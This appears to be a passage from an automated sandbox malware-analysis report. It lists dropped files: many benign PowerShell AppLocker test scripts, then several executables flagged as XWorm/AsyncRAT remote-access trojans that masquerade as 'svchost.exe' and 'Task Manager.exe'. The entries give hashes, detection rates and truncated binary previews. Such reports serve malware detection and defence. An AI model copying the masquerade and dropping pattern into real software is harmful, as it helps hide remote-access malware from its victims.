                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hgzyfgm.tzf.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44snx4vq.a5x.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3d2m2j2.pui.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eazc3edu.5en.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmdifspy.1mi.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3avciqn.tvq.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4nuu035.qeb.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkpfrirv.jmi.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4s02nie.c2c.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5xjqxul.vnn.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rp0gbebc.bft.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rshn4vvj.qmg.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t5hg4zfs.sgc.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ty024g5m.g24.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5cn0wgk.1ix.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wolrdzkz.yq3.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xopyyo5c.hm3.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xx0xkgqf.4vk.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3120v30.dhg.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yp4wtp3r.owu.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvxhdpm1.1b1.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Roaming\All function.cmd

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\dLRcE11Dkl.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):1714688
                                                                        Entropy (8bit):7.785478204182643
                                                                        Encrypted:false
                                                                        SSDEEP:24576:vKtfxJeX3D/VXvXYAhrYcqLVwQjZf9WGT7IIveSMh:vKtfyHhvztOLVJJMw7Io
                                                                        MD5:FBD77E256063E3D225B8ECEC3BDBD6DB
                                                                        SHA1:1E15B2926C8E3588DB2992B24A53289742879785
                                                                        SHA-256:1F6CD59371626C0ACB440D08CAC4B378D32B964EF61A13DEF66963B9666130A3
                                                                        SHA-512:5654796D429229BB769A5385E941032BE8E0B0F1553498024F130B45629E1E51D5D29BA64DDC786E94DCB1513325A689377F57BDD1707DE577DCB8805E6122C0
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:g............................./... ...@....@.. ....................................@.................................|/..O....@..r....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...r....@......................@..@.reloc.......`.......(..............@..B................./......H.......`....2......!...$&..<.............................................(....*.r...p*. .)..*..(....*.r...p*. *p{.*.s.........s.........s.........s.........*.r...p*.rD..p*. .O..*.r...p*. ....*.r...p*. .(T.*.r...p*. %.Q.*..(&...*.r(..p*. ...*.r...p*. E/..*.rn..p*. .h.*.r...p*. ....*.r...p*. .l..*.rW..p*. .x!.*.r...p*. ....*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............( ...(!....+..*....0......

                                                                        C:\Users\user\AppData\Roaming\All function.exe

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\All function.cmd
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):1429504
                                                                        Entropy (8bit):7.87682182292117
                                                                        Encrypted:false
                                                                        SSDEEP:24576:ESU05nunJnowgqkXxP1mHk94So/b+XnWyVKkw6KKLC8kZm3Z9/pp4yk:Ex0yow0BYE6SoyXnZ3w6K+vRDhk
                                                                        MD5:7F9590397ABD938CFD86A9A7A6E51EF6
                                                                        SHA1:CBB2E5A197FD5A93B653C6937307BA711EB502B6
                                                                        SHA-256:1968DC63A803AEE28A327E9BAC7DCEA8C2680753FA646693670F5F0FDBAE600D
                                                                        SHA-512:515BAB44E81BEC9F67590FE79897134E283D7526810072271F2176FD7CEE86CF3C32333BFE493E8589C20F750AEDFDEFE863DDCB22B043C195885C9E5F65E522
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}50g.................B...........a... ........@.. .......................@............@..................................`..S.......,.................... ....................................................... ............... ..H............text....A... ...B.................. ..`.rsrc...,............D..............@..@.reloc....... ......................@..B.................`......H........I..............V'..."............................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                        C:\Users\user\AppData\Roaming\Task Manager.exe

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\All function.cmd
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):67072
                                                                        Entropy (8bit):5.869054111119525
                                                                        Encrypted:false
                                                                        SSDEEP:1536:ApB7P9Q0nkMPLCojIUcBZy73OuBvb9mvlqX6SM0NwOlDnT6f:Ap5DPLKMnb9UMiOlDnQ
                                                                        MD5:C5ACDDD1F31EA152420CD0BEC24636BA
                                                                        SHA1:10FF89A553836685BCA9823959777C10F5EB28D0
                                                                        SHA-256:2471E51C22C68A927FB0752DEB37EA44C135BA0302B4898D13C47BF2046B3467
                                                                        SHA-512:741861F9F0A75C0264D5164A9075C38EB646199319B5CBCB61E986CC953E1D005F1FB3EB4C94A0B93CCD73706EFC6A7791ECCB33A57BA01CE48A71109562A160
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Task Manager.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Task Manager.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Task Manager.exe, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:g................................. ... ....@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......x`..,.......&.....................................................(....*.r...p*. ....*..(....*.r...p*. S...*.s.........s.........s.........s.........*.r...p*. . ..*.rw..p*. .h..*.r...p*. ....*.r...p*. ..t.*.r%..p*. ?.,.*..((...*.r-..p*. ~.H.*.rg..p*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Q...*"(....+.*&(....&+.*.+5sc... .... .'..od...(,...~....-.(_...(Q...~....oe...&.-.*.r[..p*. e...*.r...p*. ..Q.*.r...p*. .(T.*.r...p*.rC..p*. ...*.r}..p*. ...*.r...p*. ....*.r..

                                                                        C:\Users\user\AppData\Roaming\svchost.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\dLRcE11Dkl.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):72192
                                                                        Entropy (8bit):5.957835114883321
                                                                        Encrypted:false
                                                                        SSDEEP:1536:4pg0GhGEafZfYdln8baoeda9bPO26dgROjHMv8pE:4rhfZf68baoZOl2OjsKE
                                                                        MD5:E9A629DD7B0ACCDA9D7696FC15135663
                                                                        SHA1:D3643C86610E441DA6304670FE7E5C2D07D1A6DF
                                                                        SHA-256:BACE1C7A8D5498687DB5ABC129D37373A918D5BDA3EF11B94F21B3807887E799
                                                                        SHA-512:CCEADC67F570E0165B0925B450E06EAC2C46552E0B646A761862F5E6290FBDD727B84B41CA23470EDF42DA623643F29C58EA5A01BCF084F4488476ECACE144D6
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....2g............................./... ...@....@.. ....................................@................................../..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................./......H.......0d..\.......&.....................................................(....*.r...p*. B...*..(....*.r=..p*. ..9.*.s.........s.........s.........s.........*.ro..p*. .x!.*.r...p*. ..e.*.r...p*. .w..*.r...p*. .|..*.r7..p*. ....*..((...*.r7..p*.ri..p*. ...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. .l..*.r...p*. \...*.r...p*. ~.H.*.rA..p*.rs..p*. +L3.*.r...p*. .O..*.r...p*. L...*.r..

                                                                        Static File Info

                                                                        General

